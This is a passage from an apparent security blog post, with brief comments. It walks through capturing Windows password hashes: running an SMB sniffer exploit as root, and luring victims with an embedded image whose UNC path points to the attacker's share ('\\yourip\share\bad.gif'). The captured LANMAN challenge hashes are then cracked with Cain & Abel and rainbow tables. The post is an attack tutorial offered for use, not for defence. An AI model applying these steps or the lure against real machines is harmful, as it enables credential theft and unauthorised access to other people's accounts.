That future purpose is now documented!
Step 1 - Download my slightly updated version from here and place it in your exploits/ directory.
Step 2a - Run it with root privs on a UNIX host (doesn't work on Windows, sorry).
Step 2b - Have a Windows machine connect to your "share" - they will get an access denied but stuff like
![](http://www2.blogger.com/%5C%5Cyourip%5Cshare%5Cbad.gif)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq_b1ZHL8i8cDyBG277xHseHpQSR1r2aneTqw268quwtFJbU_Wv7FDmGNyB5oYyoKAU6ELCQK5UB2D8q-K86jzHt077IexyJHjOb5T_kKKWJHZBneEG5Q2XaatrHfcbDVqeQilIg/s400/framework-27-smbsniffer.png)
Step 3 - Send the hashes to Cain & Abel for cracking or cryptanalysis! Obtain the HALFLMCHALL tables from FreeRainbowCrack.Com or run a brute force, dictionary, hybrid, etc.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipX0R1CLR42ffbZNdOVIgfWQtWSMMATnMuitmFyi58ylzwJn_Amv9bSSiADqmB-Li2bhQEUGGxTbcW0PVTP-z_2-KxprEgInrtn2crbzizVqkuwd3_1OIQ4wZqvoILQKlAzfkFqQ/s400/cain-addlmchall.png)
Step 4 - Success!
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5gNnww5GbH9-Z2vdB76Bg_OgkvXeDO6gz0t7n21s5fRfxNOiBxvxoUv8veABFvNG80B7suA9ic2K2v7kqbv2szu-sGPJeVdYDMnVp49Hotb4QkBooWfEYtXfMZWbQwB-RVUNbCA/s400/cain-success-lmchall.png)
One caveat -- the half-lm challenge table only does the first 7 characters of LANMAN. You still have to brute force the last 7 and if the user's password is greater than 14 characters, you're really out of luck.
Enjoy! :)
3 comments:
See you're still at it, eh? ;-) greetings programs - smj@sdf
Of course! We're all addicts of one thing or another. :)
greetings programs -
Post a Comment